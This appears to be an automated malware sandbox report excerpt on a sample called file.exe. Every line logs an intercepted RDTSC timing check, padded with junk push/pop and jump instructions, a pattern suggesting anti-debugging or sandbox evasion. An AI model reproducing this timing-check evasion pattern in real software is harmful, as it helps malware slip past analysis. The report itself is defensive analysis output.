                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD5AD0 second address: FD5AD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD86B0 second address: FD86D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FFAACBEF8CCh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD882A second address: FD883A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F1Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD883A second address: FD883E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD8C22 second address: FD8C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF7BC second address: FDF7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF7C3 second address: FDF7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF7D6 second address: FDF7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D2h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ecx 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF7F9 second address: FDF7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF7FF second address: FDF804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE035A second address: FE0360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0360 second address: FE0377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FFAACBEF8CAh 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FFAACBEF8C6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0924 second address: FE092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE092A second address: FE0936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0C0E second address: FE0C30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAAD0A8F26h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE452A second address: FE4537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FFAACBEF8C6h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4537 second address: FE453D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE453D second address: FE4579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FFAACBEF8C6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007FFAACBEF8D0h 0x00000012 jnc 00007FFAACBEF8CCh 0x00000018 popad 0x00000019 jno 00007FFAACBEF8EDh 0x0000001f jno 00007FFAACBEF8C8h 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop esi 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4886 second address: FE4892 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F1Eh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49DA second address: FE49DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49DE second address: FE49E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49E9 second address: FE49EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49EE second address: FE49F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49F4 second address: FE49FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49FA second address: FE49FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE49FE second address: FE4A04 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A04 second address: FE4A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F23h 0x0000000c jmp 00007FFAAD0A8F23h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 js 00007FFAAD0A8F1Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A3F second address: FE4A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FFAACBEF8D7h 0x0000000c jo 00007FFAACBEF8C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE4A65 second address: FE4A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jbe 00007FFAAD0A8F16h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE5013 second address: FE5019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA009 second address: FEA017 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA017 second address: FEA01B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA01B second address: FEA01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA01F second address: FEA025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA025 second address: FEA02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEA02B second address: FEA049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0ECA second address: FF0EE9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FFAAD0A8F16h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop esi 0x0000000c pushad 0x0000000d jmp 00007FFAAD0A8F20h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0EE9 second address: FF0EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF0EEF second address: FF0EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11B9 second address: FF11BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11BF second address: FF11C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11C9 second address: FF11CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11CF second address: FF11D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11D4 second address: FF11DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11DA second address: FF11DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11DE second address: FF11EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF11EA second address: FF11EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF12FD second address: FF1303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1303 second address: FF1322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FFAAD0A8F21h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF161A second address: FF1644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jg 00007FFAACBEF8C6h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FFAACBEF8CBh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF1A3E second address: FF1A50 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FFAAD0A8F1Ch 0x0000000c js 00007FFAAD0A8F16h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2980 second address: FF298F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 js 00007FFAACBEF8C8h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF298F second address: FF2995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2995 second address: FF2999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF2999 second address: FF29B1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FFAAD0A8F16h 0x00000012 jno 00007FFAAD0A8F16h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF29B1 second address: FF29B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAAF3 second address: FFAAF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFAAF9 second address: FFAAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA4E8 second address: FFA509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F26h 0x00000009 jl 00007FFAAD0A8F16h 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA67B second address: FFA68C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA68C second address: FFA696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFAAD0A8F16h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA696 second address: FFA69A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7BC second address: FFA7C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7C2 second address: FFA7DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FFAACBEF8D7h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFA7DE second address: FFA7FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FFAAD0A8F23h 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FFAAD0A8F16h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10064DD second address: 10064E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10064E6 second address: 10064F8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFAAD0A8F1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10064F8 second address: 10064FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100632D second address: 1006355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFAAD0A8F29h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FFAAD0A8F16h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1006355 second address: 1006359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10090CF second address: 10090D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10090D5 second address: 10090D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10090D9 second address: 10090E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FFAAD0A8F16h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10090E7 second address: 10090F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FFAACBEF8C8h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100B3DB second address: 100B3ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007FFAAD0A8F1Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F41E second address: 100F43B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFAACBEF8D7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F43B second address: 100F456 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAAD0A8F1Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FFAAD0A8F16h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F456 second address: 100F45A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10144F1 second address: 10144F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10144F5 second address: 10144F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101BDC3 second address: 101BDC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1024F18 second address: 1024F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1024F1E second address: 1024F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1024F24 second address: 1024F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023AD5 second address: 1023ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023ADA second address: 1023ADF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023C38 second address: 1023C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023C3E second address: 1023C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAACBEF8D0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023C52 second address: 1023C6A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007FFAAD0A8F16h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1023C6A second address: 1023C9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007FFAACBEF8D7h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F39338 second address: F3934B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFAAD0A8F1Ch 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3934B second address: F3934F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027A28 second address: 1027A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102CF36 second address: 102CF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A8B0 second address: 103A8CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FFAAD0A8F23h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103A8CD second address: 103A8D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061102 second address: 1061108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061108 second address: 106110D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106110D second address: 106112A instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAAD0A8F2Fh 0x00000008 jmp 00007FFAAD0A8F23h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106112A second address: 1061131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061244 second address: 106124A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106124A second address: 106124E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106124E second address: 1061267 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FFAAD0A8F18h 0x00000010 pop esi 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1061267 second address: 1061274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FFAACBEF8C6h 0x0000000d rdtsc
